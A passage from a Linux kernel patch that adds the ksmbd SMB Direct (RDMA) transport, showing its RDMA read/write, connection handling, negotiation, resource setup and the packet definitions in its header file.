++	ksmbd_debug(RDMA, "RDMA %s, len %#x, needed credits %#x\n",
++		    is_read ? "read" : "write", buf_len, credits_needed);
++
++	ret = wait_for_rw_credits(t, credits_needed);
++	if (ret < 0)
++		return ret;
++
++	/* build rdma_rw_ctx for each descriptor */
++	desc_buf = buf;
++	for (i = 0; i < desc_len / sizeof(*desc); i++) {
++		msg = kzalloc(offsetof(struct smb_direct_rdma_rw_msg, sg_list) +
++			      sizeof(struct scatterlist) * SG_CHUNK_SIZE, GFP_KERNEL);
++		if (!msg) {
++			ret = -ENOMEM;
++			goto out;
++		}
++
++		desc_buf_len = le32_to_cpu(desc[i].length);
++
++		msg->t = t;
++		msg->cqe.done = is_read ? read_done : write_done;
++		msg->completion = &completion;
++
++		msg->sgt.sgl = &msg->sg_list[0];
++		ret = sg_alloc_table_chained(&msg->sgt,
++					     get_buf_page_count(desc_buf, desc_buf_len),
++					     msg->sg_list, SG_CHUNK_SIZE);
++		if (ret) {
++			kfree(msg);
++			ret = -ENOMEM;
++			goto out;
++		}
++
++		ret = get_sg_list(desc_buf, desc_buf_len,
++				  msg->sgt.sgl, msg->sgt.orig_nents);
++		if (ret < 0) {
++			sg_free_table_chained(&msg->sgt, SG_CHUNK_SIZE);
++			kfree(msg);
++			goto out;
++		}
++
++		ret = rdma_rw_ctx_init(&msg->rw_ctx, t->qp, t->qp->port,
++				       msg->sgt.sgl,
++				       get_buf_page_count(desc_buf, desc_buf_len),
++				       0,
++				       le64_to_cpu(desc[i].offset),
++				       le32_to_cpu(desc[i].token),
++				       is_read ? DMA_FROM_DEVICE : DMA_TO_DEVICE);
++		if (ret < 0) {
++			pr_err("failed to init rdma_rw_ctx: %d\n", ret);
++			sg_free_table_chained(&msg->sgt, SG_CHUNK_SIZE);
++			kfree(msg);
++			goto out;
++		}
++
++		list_add_tail(&msg->list, &msg_list);
++		desc_buf += desc_buf_len;
++	}
++
++	/* concatenate work requests of rdma_rw_ctxs */
++	first_wr = NULL;
++	list_for_each_entry_reverse(msg, &msg_list, list) {
++		first_wr = rdma_rw_ctx_wrs(&msg->rw_ctx, t->qp, t->qp->port,
++					   &msg->cqe, first_wr);
++	}
++
++	ret = ib_post_send(t->qp, first_wr, NULL);
++	if (ret) {
++		pr_err("failed to post send wr for RDMA R/W: %d\n", ret);
++		goto out;
++	}
++
++	msg = list_last_entry(&msg_list, struct smb_direct_rdma_rw_msg, list);
++	wait_for_completion(&completion);
++	ret = msg->status;
++out:
++	list_for_each_entry_safe(msg, next_msg, &msg_list, list) {
++		list_del(&msg->list);
++		smb_direct_free_rdma_rw_msg(t, msg,
++					    is_read ? DMA_FROM_DEVICE : DMA_TO_DEVICE);
++	}
++	atomic_add(credits_needed, &t->rw_credits);
++	wake_up(&t->wait_rw_credits);
++	return ret;
++}
++
++static int smb_direct_rdma_write(struct ksmbd_transport *t,
++				 void *buf, unsigned int buflen,
++				 struct smb2_buffer_desc_v1 *desc,
++				 unsigned int desc_len)
++{
++	return smb_direct_rdma_xmit(smb_trans_direct_transfort(t), buf, buflen,
++				    desc, desc_len, false);
++}
++
++static int smb_direct_rdma_read(struct ksmbd_transport *t,
++				void *buf, unsigned int buflen,
++				struct smb2_buffer_desc_v1 *desc,
++				unsigned int desc_len)
++{
++	return smb_direct_rdma_xmit(smb_trans_direct_transfort(t), buf, buflen,
++				    desc, desc_len, true);
++}
++
++static void smb_direct_disconnect(struct ksmbd_transport *t)
++{
++	struct smb_direct_transport *st = smb_trans_direct_transfort(t);
++
++	ksmbd_debug(RDMA, "Disconnecting cm_id=%p\n", st->cm_id);
++
++	smb_direct_disconnect_rdma_work(&st->disconnect_work);
++	wait_event_interruptible(st->wait_status,
++				 st->status == SMB_DIRECT_CS_DISCONNECTED);
++	free_transport(st);
++}
++
++static void smb_direct_shutdown(struct ksmbd_transport *t)
++{
++	struct smb_direct_transport *st = smb_trans_direct_transfort(t);
++
++	ksmbd_debug(RDMA, "smb-direct shutdown cm_id=%p\n", st->cm_id);
++
++	smb_direct_disconnect_rdma_work(&st->disconnect_work);
++}
++
++static int smb_direct_cm_handler(struct rdma_cm_id *cm_id,
++				 struct rdma_cm_event *event)
++{
++	struct smb_direct_transport *t = cm_id->context;
++
++	ksmbd_debug(RDMA, "RDMA CM event. cm_id=%p event=%s (%d)\n",
++		    cm_id, rdma_event_msg(event->event), event->event);
++
++	switch (event->event) {
++	case RDMA_CM_EVENT_ESTABLISHED: {
++		t->status = SMB_DIRECT_CS_CONNECTED;
++		wake_up_interruptible(&t->wait_status);
++		break;
++	}
++	case RDMA_CM_EVENT_DEVICE_REMOVAL:
++	case RDMA_CM_EVENT_DISCONNECTED: {
++		ib_drain_qp(t->qp);
++
++		t->status = SMB_DIRECT_CS_DISCONNECTED;
++		wake_up_interruptible(&t->wait_status);
++		wake_up_interruptible(&t->wait_reassembly_queue);
++		wake_up(&t->wait_send_credits);
++		break;
++	}
++	case RDMA_CM_EVENT_CONNECT_ERROR: {
++		t->status = SMB_DIRECT_CS_DISCONNECTED;
++		wake_up_interruptible(&t->wait_status);
++		break;
++	}
++	default:
++		pr_err("Unexpected RDMA CM event. cm_id=%p, event=%s (%d)\n",
++		       cm_id, rdma_event_msg(event->event),
++		       event->event);
++		break;
++	}
++	return 0;
++}
++
++static void smb_direct_qpair_handler(struct ib_event *event, void *context)
++{
++	struct smb_direct_transport *t = context;
++
++	ksmbd_debug(RDMA, "Received QP event. cm_id=%p, event=%s (%d)\n",
++		    t->cm_id, ib_event_msg(event->event), event->event);
++
++	switch (event->event) {
++	case IB_EVENT_CQ_ERR:
++	case IB_EVENT_QP_FATAL:
++		smb_direct_disconnect_rdma_connection(t);
++		break;
++	default:
++		break;
++	}
++}
++
++static int smb_direct_send_negotiate_response(struct smb_direct_transport *t,
++					      int failed)
++{
++	struct smb_direct_sendmsg *sendmsg;
++	struct smb_direct_negotiate_resp *resp;
++	int ret;
++
++	sendmsg = smb_direct_alloc_sendmsg(t);
++	if (IS_ERR(sendmsg))
++		return -ENOMEM;
++
++	resp = (struct smb_direct_negotiate_resp *)sendmsg->packet;
++	if (failed) {
++		memset(resp, 0, sizeof(*resp));
++		resp->min_version = cpu_to_le16(0x0100);
++		resp->max_version = cpu_to_le16(0x0100);
++		resp->status = STATUS_NOT_SUPPORTED;
++	} else {
++		resp->status = STATUS_SUCCESS;
++		resp->min_version = SMB_DIRECT_VERSION_LE;
++		resp->max_version = SMB_DIRECT_VERSION_LE;
++		resp->negotiated_version = SMB_DIRECT_VERSION_LE;
++		resp->reserved = 0;
++		resp->credits_requested =
++				cpu_to_le16(t->send_credit_target);
++		resp->credits_granted = cpu_to_le16(manage_credits_prior_sending(t));
++		resp->max_readwrite_size = cpu_to_le32(t->max_rdma_rw_size);
++		resp->preferred_send_size = cpu_to_le32(t->max_send_size);
++		resp->max_receive_size = cpu_to_le32(t->max_recv_size);
++		resp->max_fragmented_size =
++				cpu_to_le32(t->max_fragmented_recv_size);
++	}
++
++	sendmsg->sge[0].addr = ib_dma_map_single(t->cm_id->device,
++						 (void *)resp, sizeof(*resp),
++						 DMA_TO_DEVICE);
++	ret = ib_dma_mapping_error(t->cm_id->device, sendmsg->sge[0].addr);
++	if (ret) {
++		smb_direct_free_sendmsg(t, sendmsg);
++		return ret;
++	}
++
++	sendmsg->num_sge = 1;
++	sendmsg->sge[0].length = sizeof(*resp);
++	sendmsg->sge[0].lkey = t->pd->local_dma_lkey;
++
++	ret = post_sendmsg(t, NULL, sendmsg);
++	if (ret) {
++		smb_direct_free_sendmsg(t, sendmsg);
++		return ret;
++	}
++
++	wait_event(t->wait_send_pending,
++		   atomic_read(&t->send_pending) == 0);
++	return 0;
++}
++
++static int smb_direct_accept_client(struct smb_direct_transport *t)
++{
++	struct rdma_conn_param conn_param;
++	struct ib_port_immutable port_immutable;
++	u32 ird_ord_hdr[2];
++	int ret;
++
++	memset(&conn_param, 0, sizeof(conn_param));
++	conn_param.initiator_depth = min_t(u8, t->cm_id->device->attrs.max_qp_rd_atom,
++					   SMB_DIRECT_CM_INITIATOR_DEPTH);
++	conn_param.responder_resources = 0;
++
++	t->cm_id->device->ops.get_port_immutable(t->cm_id->device,
++						 t->cm_id->port_num,
++						 &port_immutable);
++	if (port_immutable.core_cap_flags & RDMA_CORE_PORT_IWARP) {
++		ird_ord_hdr[0] = conn_param.responder_resources;
++		ird_ord_hdr[1] = 1;
++		conn_param.private_data = ird_ord_hdr;
++		conn_param.private_data_len = sizeof(ird_ord_hdr);
++	} else {
++		conn_param.private_data = NULL;
++		conn_param.private_data_len = 0;
++	}
++	conn_param.retry_count = SMB_DIRECT_CM_RETRY;
++	conn_param.rnr_retry_count = SMB_DIRECT_CM_RNR_RETRY;
++	conn_param.flow_control = 0;
++
++	ret = rdma_accept(t->cm_id, &conn_param);
++	if (ret) {
++		pr_err("error at rdma_accept: %d\n", ret);
++		return ret;
++	}
++	return 0;
++}
++
++static int smb_direct_prepare_negotiation(struct smb_direct_transport *t)
++{
++	int ret;
++	struct smb_direct_recvmsg *recvmsg;
++
++	recvmsg = get_free_recvmsg(t);
++	if (!recvmsg)
++		return -ENOMEM;
++	recvmsg->type = SMB_DIRECT_MSG_NEGOTIATE_REQ;
++
++	ret = smb_direct_post_recv(t, recvmsg);
++	if (ret) {
++		pr_err("Can't post recv: %d\n", ret);
++		goto out_err;
++	}
++
++	t->negotiation_requested = false;
++	ret = smb_direct_accept_client(t);
++	if (ret) {
++		pr_err("Can't accept client\n");
++		goto out_err;
++	}
++
++	smb_direct_post_recv_credits(&t->post_recv_credits_work.work);
++	return 0;
++out_err:
++	put_recvmsg(t, recvmsg);
++	return ret;
++}
++
++static unsigned int smb_direct_get_max_fr_pages(struct smb_direct_transport *t)
++{
++	return min_t(unsigned int,
++		     t->cm_id->device->attrs.max_fast_reg_page_list_len,
++		     256);
++}
++
++static int smb_direct_init_params(struct smb_direct_transport *t,
++				  struct ib_qp_cap *cap)
++{
++	struct ib_device *device = t->cm_id->device;
++	int max_send_sges, max_rw_wrs, max_send_wrs;
++	unsigned int max_sge_per_wr, wrs_per_credit;
++
++	/* need 3 more sge. because a SMB_DIRECT header, SMB2 header,
++	 * SMB2 response could be mapped.
++	 */
++	t->max_send_size = smb_direct_max_send_size;
++	max_send_sges = DIV_ROUND_UP(t->max_send_size, PAGE_SIZE) + 3;
++	if (max_send_sges > SMB_DIRECT_MAX_SEND_SGES) {
++		pr_err("max_send_size %d is too large\n", t->max_send_size);
++		return -EINVAL;
++	}
++
++	/* Calculate the number of work requests for RDMA R/W.
++	 * The maximum number of pages which can be registered
++	 * with one Memory region can be transferred with one
++	 * R/W credit. And at least 4 work requests for each credit
++	 * are needed for MR registration, RDMA R/W, local & remote
++	 * MR invalidation.
++	 */
++	t->max_rdma_rw_size = smb_direct_max_read_write_size;
++	t->pages_per_rw_credit = smb_direct_get_max_fr_pages(t);
++	t->max_rw_credits = DIV_ROUND_UP(t->max_rdma_rw_size,
++					 (t->pages_per_rw_credit - 1) *
++					 PAGE_SIZE);
++
++	max_sge_per_wr = min_t(unsigned int, device->attrs.max_send_sge,
++			       device->attrs.max_sge_rd);
++	max_sge_per_wr = max_t(unsigned int, max_sge_per_wr,
++			       max_send_sges);
++	wrs_per_credit = max_t(unsigned int, 4,
++			       DIV_ROUND_UP(t->pages_per_rw_credit,
++					    max_sge_per_wr) + 1);
++	max_rw_wrs = t->max_rw_credits * wrs_per_credit;
++
++	max_send_wrs = smb_direct_send_credit_target + max_rw_wrs;
++	if (max_send_wrs > device->attrs.max_cqe ||
++	    max_send_wrs > device->attrs.max_qp_wr) {
++		pr_err("consider lowering send_credit_target = %d\n",
++		       smb_direct_send_credit_target);
++		pr_err("Possible CQE overrun, device reporting max_cqe %d max_qp_wr %d\n",
++		       device->attrs.max_cqe, device->attrs.max_qp_wr);
++		return -EINVAL;
++	}
++
++	if (smb_direct_receive_credit_max > device->attrs.max_cqe ||
++	    smb_direct_receive_credit_max > device->attrs.max_qp_wr) {
++		pr_err("consider lowering receive_credit_max = %d\n",
++		       smb_direct_receive_credit_max);
++		pr_err("Possible CQE overrun, device reporting max_cpe %d max_qp_wr %d\n",
++		       device->attrs.max_cqe, device->attrs.max_qp_wr);
++		return -EINVAL;
++	}
++
++	if (device->attrs.max_recv_sge < SMB_DIRECT_MAX_RECV_SGES) {
++		pr_err("warning: device max_recv_sge = %d too small\n",
++		       device->attrs.max_recv_sge);
++		return -EINVAL;
++	}
++
++	t->recv_credits = 0;
++	t->count_avail_recvmsg = 0;
++
++	t->recv_credit_max = smb_direct_receive_credit_max;
++	t->recv_credit_target = 10;
++	t->new_recv_credits = 0;
++
++	t->send_credit_target = smb_direct_send_credit_target;
++	atomic_set(&t->send_credits, 0);
++	atomic_set(&t->rw_credits, t->max_rw_credits);
++
++	t->max_send_size = smb_direct_max_send_size;
++	t->max_recv_size = smb_direct_max_receive_size;
++	t->max_fragmented_recv_size = smb_direct_max_fragmented_recv_size;
++
++	cap->max_send_wr = max_send_wrs;
++	cap->max_recv_wr = t->recv_credit_max;
++	cap->max_send_sge = max_sge_per_wr;
++	cap->max_recv_sge = SMB_DIRECT_MAX_RECV_SGES;
++	cap->max_inline_data = 0;
++	cap->max_rdma_ctxs = t->max_rw_credits;
++	return 0;
++}
++
++static void smb_direct_destroy_pools(struct smb_direct_transport *t)
++{
++	struct smb_direct_recvmsg *recvmsg;
++
++	while ((recvmsg = get_free_recvmsg(t)))
++		mempool_free(recvmsg, t->recvmsg_mempool);
++	while ((recvmsg = get_empty_recvmsg(t)))
++		mempool_free(recvmsg, t->recvmsg_mempool);
++
++	mempool_destroy(t->recvmsg_mempool);
++	t->recvmsg_mempool = NULL;
++
++	kmem_cache_destroy(t->recvmsg_cache);
++	t->recvmsg_cache = NULL;
++
++	mempool_destroy(t->sendmsg_mempool);
++	t->sendmsg_mempool = NULL;
++
++	kmem_cache_destroy(t->sendmsg_cache);
++	t->sendmsg_cache = NULL;
++}
++
++static int smb_direct_create_pools(struct smb_direct_transport *t)
++{
++	char name[80];
++	int i;
++	struct smb_direct_recvmsg *recvmsg;
++
++	snprintf(name, sizeof(name), "smb_direct_rqst_pool_%p", t);
++	t->sendmsg_cache = kmem_cache_create(name,
++					     sizeof(struct smb_direct_sendmsg) +
++					      sizeof(struct smb_direct_negotiate_resp),
++					     0, SLAB_HWCACHE_ALIGN, NULL);
++	if (!t->sendmsg_cache)
++		return -ENOMEM;
++
++	t->sendmsg_mempool = mempool_create(t->send_credit_target,
++					    mempool_alloc_slab, mempool_free_slab,
++					    t->sendmsg_cache);
++	if (!t->sendmsg_mempool)
++		goto err;
++
++	snprintf(name, sizeof(name), "smb_direct_resp_%p", t);
++	t->recvmsg_cache = kmem_cache_create(name,
++					     sizeof(struct smb_direct_recvmsg) +
++					      t->max_recv_size,
++					     0, SLAB_HWCACHE_ALIGN, NULL);
++	if (!t->recvmsg_cache)
++		goto err;
++
++	t->recvmsg_mempool =
++		mempool_create(t->recv_credit_max, mempool_alloc_slab,
++			       mempool_free_slab, t->recvmsg_cache);
++	if (!t->recvmsg_mempool)
++		goto err;
++
++	INIT_LIST_HEAD(&t->recvmsg_queue);
++
++	for (i = 0; i < t->recv_credit_max; i++) {
++		recvmsg = mempool_alloc(t->recvmsg_mempool, GFP_KERNEL);
++		if (!recvmsg)
++			goto err;
++		recvmsg->transport = t;
++		list_add(&recvmsg->list, &t->recvmsg_queue);
++	}
++	t->count_avail_recvmsg = t->recv_credit_max;
++
++	return 0;
++err:
++	smb_direct_destroy_pools(t);
++	return -ENOMEM;
++}
++
++static int smb_direct_create_qpair(struct smb_direct_transport *t,
++				   struct ib_qp_cap *cap)
++{
++	int ret;
++	struct ib_qp_init_attr qp_attr;
++	int pages_per_rw;
++
++	t->pd = ib_alloc_pd(t->cm_id->device, 0);
++	if (IS_ERR(t->pd)) {
++		pr_err("Can't create RDMA PD\n");
++		ret = PTR_ERR(t->pd);
++		t->pd = NULL;
++		return ret;
++	}
++
++	t->send_cq = ib_alloc_cq(t->cm_id->device, t,
++				 smb_direct_send_credit_target + cap->max_rdma_ctxs,
++				 0, IB_POLL_WORKQUEUE);
++	if (IS_ERR(t->send_cq)) {
++		pr_err("Can't create RDMA send CQ\n");
++		ret = PTR_ERR(t->send_cq);
++		t->send_cq = NULL;
++		goto err;
++	}
++
++	t->recv_cq = ib_alloc_cq(t->cm_id->device, t,
++				 t->recv_credit_max, 0, IB_POLL_WORKQUEUE);
++	if (IS_ERR(t->recv_cq)) {
++		pr_err("Can't create RDMA recv CQ\n");
++		ret = PTR_ERR(t->recv_cq);
++		t->recv_cq = NULL;
++		goto err;
++	}
++
++	memset(&qp_attr, 0, sizeof(qp_attr));
++	qp_attr.event_handler = smb_direct_qpair_handler;
++	qp_attr.qp_context = t;
++	qp_attr.cap = *cap;
++	qp_attr.sq_sig_type = IB_SIGNAL_REQ_WR;
++	qp_attr.qp_type = IB_QPT_RC;
++	qp_attr.send_cq = t->send_cq;
++	qp_attr.recv_cq = t->recv_cq;
++	qp_attr.port_num = ~0;
++
++	ret = rdma_create_qp(t->cm_id, t->pd, &qp_attr);
++	if (ret) {
++		pr_err("Can't create RDMA QP: %d\n", ret);
++		goto err;
++	}
++
++	t->qp = t->cm_id->qp;
++	t->cm_id->event_handler = smb_direct_cm_handler;
++
++	pages_per_rw = DIV_ROUND_UP(t->max_rdma_rw_size, PAGE_SIZE) + 1;
++	if (pages_per_rw > t->cm_id->device->attrs.max_sgl_rd) {
++		ret = ib_mr_pool_init(t->qp, &t->qp->rdma_mrs,
++				      t->max_rw_credits, IB_MR_TYPE_MEM_REG,
++				      t->pages_per_rw_credit, 0);
++		if (ret) {
++			pr_err("failed to init mr pool count %d pages %d\n",
++			       t->max_rw_credits, t->pages_per_rw_credit);
++			goto err;
++		}
++	}
++
++	return 0;
++err:
++	if (t->qp) {
++		ib_destroy_qp(t->qp);
++		t->qp = NULL;
++	}
++	if (t->recv_cq) {
++		ib_destroy_cq(t->recv_cq);
++		t->recv_cq = NULL;
++	}
++	if (t->send_cq) {
++		ib_destroy_cq(t->send_cq);
++		t->send_cq = NULL;
++	}
++	if (t->pd) {
++		ib_dealloc_pd(t->pd);
++		t->pd = NULL;
++	}
++	return ret;
++}
++
++static int smb_direct_prepare(struct ksmbd_transport *t)
++{
++	struct smb_direct_transport *st = smb_trans_direct_transfort(t);
++	struct smb_direct_recvmsg *recvmsg;
++	struct smb_direct_negotiate_req *req;
++	int ret;
++
++	ksmbd_debug(RDMA, "Waiting for SMB_DIRECT negotiate request\n");
++	ret = wait_event_interruptible_timeout(st->wait_status,
++					       st->negotiation_requested ||
++					       st->status == SMB_DIRECT_CS_DISCONNECTED,
++					       SMB_DIRECT_NEGOTIATE_TIMEOUT * HZ);
++	if (ret <= 0 || st->status == SMB_DIRECT_CS_DISCONNECTED)
++		return ret < 0 ? ret : -ETIMEDOUT;
++
++	recvmsg = get_first_reassembly(st);
++	if (!recvmsg)
++		return -ECONNABORTED;
++
++	ret = smb_direct_check_recvmsg(recvmsg);
++	if (ret == -ECONNABORTED)
++		goto out;
++
++	req = (struct smb_direct_negotiate_req *)recvmsg->packet;
++	st->max_recv_size = min_t(int, st->max_recv_size,
++				  le32_to_cpu(req->preferred_send_size));
++	st->max_send_size = min_t(int, st->max_send_size,
++				  le32_to_cpu(req->max_receive_size));
++	st->max_fragmented_send_size =
++		le32_to_cpu(req->max_fragmented_size);
++	st->max_fragmented_recv_size =
++		(st->recv_credit_max * st->max_recv_size) / 2;
++
++	ret = smb_direct_send_negotiate_response(st, ret);
++out:
++	spin_lock_irq(&st->reassembly_queue_lock);
++	st->reassembly_queue_length--;
++	list_del(&recvmsg->list);
++	spin_unlock_irq(&st->reassembly_queue_lock);
++	put_recvmsg(st, recvmsg);
++
++	return ret;
++}
++
++static int smb_direct_connect(struct smb_direct_transport *st)
++{
++	int ret;
++	struct ib_qp_cap qp_cap;
++
++	ret = smb_direct_init_params(st, &qp_cap);
++	if (ret) {
++		pr_err("Can't configure RDMA parameters\n");
++		return ret;
++	}
++
++	ret = smb_direct_create_pools(st);
++	if (ret) {
++		pr_err("Can't init RDMA pool: %d\n", ret);
++		return ret;
++	}
++
++	ret = smb_direct_create_qpair(st, &qp_cap);
++	if (ret) {
++		pr_err("Can't accept RDMA client: %d\n", ret);
++		return ret;
++	}
++
++	ret = smb_direct_prepare_negotiation(st);
++	if (ret) {
++		pr_err("Can't negotiate: %d\n", ret);
++		return ret;
++	}
++	return 0;
++}
++
++static bool rdma_frwr_is_supported(struct ib_device_attr *attrs)
++{
++	if (!(attrs->device_cap_flags & IB_DEVICE_MEM_MGT_EXTENSIONS))
++		return false;
++	if (attrs->max_fast_reg_page_list_len == 0)
++		return false;
++	return true;
++}
++
++static int smb_direct_handle_connect_request(struct rdma_cm_id *new_cm_id)
++{
++	struct smb_direct_transport *t;
++	int ret;
++
++	if (!rdma_frwr_is_supported(&new_cm_id->device->attrs)) {
++		ksmbd_debug(RDMA,
++			    "Fast Registration Work Requests is not supported. device capabilities=%llx\n",
++			    new_cm_id->device->attrs.device_cap_flags);
++		return -EPROTONOSUPPORT;
++	}
++
++	t = alloc_transport(new_cm_id);
++	if (!t)
++		return -ENOMEM;
++
++	ret = smb_direct_connect(t);
++	if (ret)
++		goto out_err;
++
++	KSMBD_TRANS(t)->handler = kthread_run(ksmbd_conn_handler_loop,
++					      KSMBD_TRANS(t)->conn, "ksmbd:r%u",
++					      smb_direct_port);
++	if (IS_ERR(KSMBD_TRANS(t)->handler)) {
++		ret = PTR_ERR(KSMBD_TRANS(t)->handler);
++		pr_err("Can't start thread\n");
++		goto out_err;
++	}
++
++	return 0;
++out_err:
++	free_transport(t);
++	return ret;
++}
++
++static int smb_direct_listen_handler(struct rdma_cm_id *cm_id,
++				     struct rdma_cm_event *event)
++{
++	switch (event->event) {
++	case RDMA_CM_EVENT_CONNECT_REQUEST: {
++		int ret = smb_direct_handle_connect_request(cm_id);
++
++		if (ret) {
++			pr_err("Can't create transport: %d\n", ret);
++			return ret;
++		}
++
++		ksmbd_debug(RDMA, "Received connection request. cm_id=%p\n",
++			    cm_id);
++		break;
++	}
++	default:
++		pr_err("Unexpected listen event. cm_id=%p, event=%s (%d)\n",
++		       cm_id, rdma_event_msg(event->event), event->event);
++		break;
++	}
++	return 0;
++}
++
++static int smb_direct_listen(int port)
++{
++	int ret;
++	struct rdma_cm_id *cm_id;
++	struct sockaddr_in sin = {
++		.sin_family		= AF_INET,
++		.sin_addr.s_addr	= htonl(INADDR_ANY),
++		.sin_port		= htons(port),
++	};
++
++	cm_id = rdma_create_id(&init_net, smb_direct_listen_handler,
++			       &smb_direct_listener, RDMA_PS_TCP, IB_QPT_RC);
++	if (IS_ERR(cm_id)) {
++		pr_err("Can't create cm id: %ld\n", PTR_ERR(cm_id));
++		return PTR_ERR(cm_id);
++	}
++
++	ret = rdma_bind_addr(cm_id, (struct sockaddr *)&sin);
++	if (ret) {
++		pr_err("Can't bind: %d\n", ret);
++		goto err;
++	}
++
++	smb_direct_listener.cm_id = cm_id;
++
++	ret = rdma_listen(cm_id, 10);
++	if (ret) {
++		pr_err("Can't listen: %d\n", ret);
++		goto err;
++	}
++	return 0;
++err:
++	smb_direct_listener.cm_id = NULL;
++	rdma_destroy_id(cm_id);
++	return ret;
++}
++
++static int smb_direct_ib_client_add(struct ib_device *ib_dev)
++{
++	struct smb_direct_device *smb_dev;
++
++	/* Set 5445 port if device type is iWARP(No IB) */
++	if (ib_dev->node_type != RDMA_NODE_IB_CA)
++		smb_direct_port = SMB_DIRECT_PORT_IWARP;
++
++	if (!ib_dev->ops.get_netdev ||
++	    !rdma_frwr_is_supported(&ib_dev->attrs))
++		return 0;
++
++	smb_dev = kzalloc(sizeof(*smb_dev), GFP_KERNEL);
++	if (!smb_dev)
++		return -ENOMEM;
++	smb_dev->ib_dev = ib_dev;
++
++	write_lock(&smb_direct_device_lock);
++	list_add(&smb_dev->list, &smb_direct_device_list);
++	write_unlock(&smb_direct_device_lock);
++
++	ksmbd_debug(RDMA, "ib device added: name %s\n", ib_dev->name);
++	return 0;
++}
++
++static void smb_direct_ib_client_remove(struct ib_device *ib_dev,
++					void *client_data)
++{
++	struct smb_direct_device *smb_dev, *tmp;
++
++	write_lock(&smb_direct_device_lock);
++	list_for_each_entry_safe(smb_dev, tmp, &smb_direct_device_list, list) {
++		if (smb_dev->ib_dev == ib_dev) {
++			list_del(&smb_dev->list);
++			kfree(smb_dev);
++			break;
++		}
++	}
++	write_unlock(&smb_direct_device_lock);
++}
++
++static struct ib_client smb_direct_ib_client = {
++	.name	= "ksmbd_smb_direct_ib",
++	.add	= smb_direct_ib_client_add,
++	.remove	= smb_direct_ib_client_remove,
++};
++
++int ksmbd_rdma_init(void)
++{
++	int ret;
++
++	smb_direct_listener.cm_id = NULL;
++
++	ret = ib_register_client(&smb_direct_ib_client);
++	if (ret) {
++		pr_err("failed to ib_register_client\n");
++		return ret;
++	}
++
++	/* When a client is running out of send credits, the credits are
++	 * granted by the server's sending a packet using this queue.
++	 * This avoids the situation that a clients cannot send packets
++	 * for lack of credits
++	 */
++	smb_direct_wq = alloc_workqueue("ksmbd-smb_direct-wq",
++					WQ_HIGHPRI | WQ_MEM_RECLAIM, 0);
++	if (!smb_direct_wq)
++		return -ENOMEM;
++
++	ret = smb_direct_listen(smb_direct_port);
++	if (ret) {
++		destroy_workqueue(smb_direct_wq);
++		smb_direct_wq = NULL;
++		pr_err("Can't listen: %d\n", ret);
++		return ret;
++	}
++
++	ksmbd_debug(RDMA, "init RDMA listener. cm_id=%p\n",
++		    smb_direct_listener.cm_id);
++	return 0;
++}
++
++void ksmbd_rdma_destroy(void)
++{
++	if (!smb_direct_listener.cm_id)
++		return;
++
++	ib_unregister_client(&smb_direct_ib_client);
++	rdma_destroy_id(smb_direct_listener.cm_id);
++
++	smb_direct_listener.cm_id = NULL;
++
++	if (smb_direct_wq) {
++		destroy_workqueue(smb_direct_wq);
++		smb_direct_wq = NULL;
++	}
++}
++
++bool ksmbd_rdma_capable_netdev(struct net_device *netdev)
++{
++	struct smb_direct_device *smb_dev;
++	int i;
++	bool rdma_capable = false;
++
++	read_lock(&smb_direct_device_lock);
++	list_for_each_entry(smb_dev, &smb_direct_device_list, list) {
++		for (i = 0; i < smb_dev->ib_dev->phys_port_cnt; i++) {
++			struct net_device *ndev;
++
++			ndev = smb_dev->ib_dev->ops.get_netdev(smb_dev->ib_dev,
++							       i + 1);
++			if (!ndev)
++				continue;
++
++			if (ndev == netdev) {
++				dev_put(ndev);
++				rdma_capable = true;
++				goto out;
++			}
++			dev_put(ndev);
++		}
++	}
++out:
++	read_unlock(&smb_direct_device_lock);
++
++	if (rdma_capable == false) {
++		struct ib_device *ibdev;
++
++		ibdev = ib_device_get_by_netdev(netdev, RDMA_DRIVER_UNKNOWN);
++		if (ibdev) {
++			if (rdma_frwr_is_supported(&ibdev->attrs))
++				rdma_capable = true;
++			ib_device_put(ibdev);
++		}
++	}
++
++	return rdma_capable;
++}
++
++static struct ksmbd_transport_ops ksmbd_smb_direct_transport_ops = {
++	.prepare	= smb_direct_prepare,
++	.disconnect	= smb_direct_disconnect,
++	.shutdown	= smb_direct_shutdown,
++	.writev		= smb_direct_writev,
++	.read		= smb_direct_read,
++	.rdma_read	= smb_direct_rdma_read,
++	.rdma_write	= smb_direct_rdma_write,
++};
+diff --git a/fs/smb/server/transport_rdma.h b/fs/smb/server/transport_rdma.h
+new file mode 100644
+index 0000000000000..77aee4e5c9dcd
+--- /dev/null
++++ b/fs/smb/server/transport_rdma.h
+@@ -0,0 +1,69 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ *   Copyright (C) 2017, Microsoft Corporation.
++ *   Copyright (C) 2018, LG Electronics.
++ */
++
++#ifndef __KSMBD_TRANSPORT_RDMA_H__
++#define __KSMBD_TRANSPORT_RDMA_H__
++
++#define SMBD_DEFAULT_IOSIZE (8 * 1024 * 1024)
++#define SMBD_MIN_IOSIZE (512 * 1024)
++#define SMBD_MAX_IOSIZE (16 * 1024 * 1024)
++
++/* SMB DIRECT negotiation request packet [MS-SMBD] 2.2.1 */
++struct smb_direct_negotiate_req {
++	__le16 min_version;
++	__le16 max_version;
++	__le16 reserved;
++	__le16 credits_requested;
++	__le32 preferred_send_size;
++	__le32 max_receive_size;
++	__le32 max_fragmented_size;
++} __packed;
++
++/* SMB DIRECT negotiation response packet [MS-SMBD] 2.2.2 */
++struct smb_direct_negotiate_resp {
++	__le16 min_version;
++	__le16 max_version;
++	__le16 negotiated_version;
++	__le16 reserved;
++	__le16 credits_requested;
++	__le16 credits_granted;
++	__le32 status;
++	__le32 max_readwrite_size;
++	__le32 preferred_send_size;
++	__le32 max_receive_size;
++	__le32 max_fragmented_size;
++} __packed;
++
++#define SMB_DIRECT_RESPONSE_REQUESTED 0x0001
++
++/* SMB DIRECT data transfer packet with payload [MS-SMBD] 2.2.3 */
++struct smb_direct_data_transfer {
++	__le16 credits_requested;
++	__le16 credits_granted;
++	__le16 flags;
++	__le16 reserved;
++	__le32 remaining_data_length;
++	__le32 data_offset;
++	__le32 data_length;
++	__le32 padding;
++	__u8 buffer[];
++} __packed;
++
++#ifdef CONFIG_SMB_SERVER_SMBDIRECT
++int ksmbd_rdma_init(void);
++void ksmbd_rdma_destroy(void);
++bool ksmbd_rdma_capable_netdev(struct net_device *netdev);
++void init_smbd_max_io_size(unsigned int sz);
++unsigned int get_smbd_max_read_write_size(void);
++#else
++static inline int ksmbd_rdma_init(void) { return 0; }
++static inline int ksmbd_rdma_destroy(void) { return 0; }
++static inline bool ksmbd_rdma_capable_netdev(struct net_device *netdev) { return false; }
